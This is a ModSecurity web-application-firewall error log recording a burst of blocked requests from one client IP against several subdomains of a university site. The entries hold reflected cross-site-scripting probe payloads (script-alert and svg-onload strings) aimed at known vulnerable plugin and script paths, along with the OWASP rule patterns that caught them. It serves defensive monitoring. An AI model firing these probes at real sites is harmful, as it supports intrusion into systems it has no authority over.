[Tue Aug 29 11:52:58.527104 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15qsCo-f0AAAnd3PYAAAAI"]
[Tue Aug 29 11:52:58.581177 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15qsCo-f0AAAoLfOgAAAAG"]
[Tue Aug 29 11:52:58.697556 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15qsCo-f0AAAoT7S0AAAAD"]
[Tue Aug 29 11:52:59.192373 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAfWOTIAAAAL"]
[Tue Aug 29 11:52:59.202799 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAoZ6RMAAAAK"]
[Tue Aug 29 11:52:59.207685 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAoVqrsAAAAH"]
[Tue Aug 29 11:52:59.207749 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAoesJwAAAAV"]
[Tue Aug 29 11:52:59.223293 2023] [:error] [pid 2589] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAodkpAAAAAS"]
[Tue Aug 29 11:52:59.660720 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAnd3PkAAAAI"]
[Tue Aug 29 11:53:00.563549 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAofm3oAAAAX"]
[Tue Aug 29 11:53:00.665512 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAfWOTgAAAAL"]
[Tue Aug 29 11:53:00.672851 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAoLfPAAAAAG"]
[Tue Aug 29 11:53:00.691274 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAog@BQAAAAY"]
[Tue Aug 29 11:53:00.693677 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAojanUAAAAb"]
[Tue Aug 29 11:53:00.695443 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAoml0AAAAAf"]
[Tue Aug 29 11:53:00.712601 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAog@BUAAAAY"]
[Tue Aug 29 11:53:00.713106 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAfWOToAAAAL"]
[Tue Aug 29 11:53:00.715340 2023] [:error] [pid 2596] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAoky2AAAAAd"]
[Tue Aug 29 11:53:00.718334 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAoml0EAAAAf"]
[Tue Aug 29 11:53:01.556132 2023] [:error] [pid 2593] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rcCo-f0AAAohZ5YAAAAZ"]
[Tue Aug 29 11:53:01.556700 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAoqbOIAAAAj"]
[Tue Aug 29 11:53:01.572269 2023] [:error] [pid 2600] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAoocvEAAAAh"]
[Tue Aug 29 11:53:01.572348 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rcCo-f0AAAot8K4AAAAn"]
[Tue Aug 29 11:53:01.573162 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rcCo-f0AAAofm34AAAAX"]
[Tue Aug 29 11:53:01.573393 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rcCo-f0AAAoXJtQAAAAP"]
[Tue Aug 29 11:53:01.573621 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAoml0IAAAAf"]
[Tue Aug 29 11:53:01.578538 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rcCo-f0AAAoAkvsAAAAC"]
[Tue Aug 29 11:53:01.578873 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAfWOTsAAAAL"]
[Tue Aug 29 11:53:01.676554 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rcCo-f0AAAfWOTwAAAAL"]
[Tue Aug 29 11:53:01.788365 2023] [:error] [pid 2600] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rcCo-f0AAAoocvIAAAAh"]
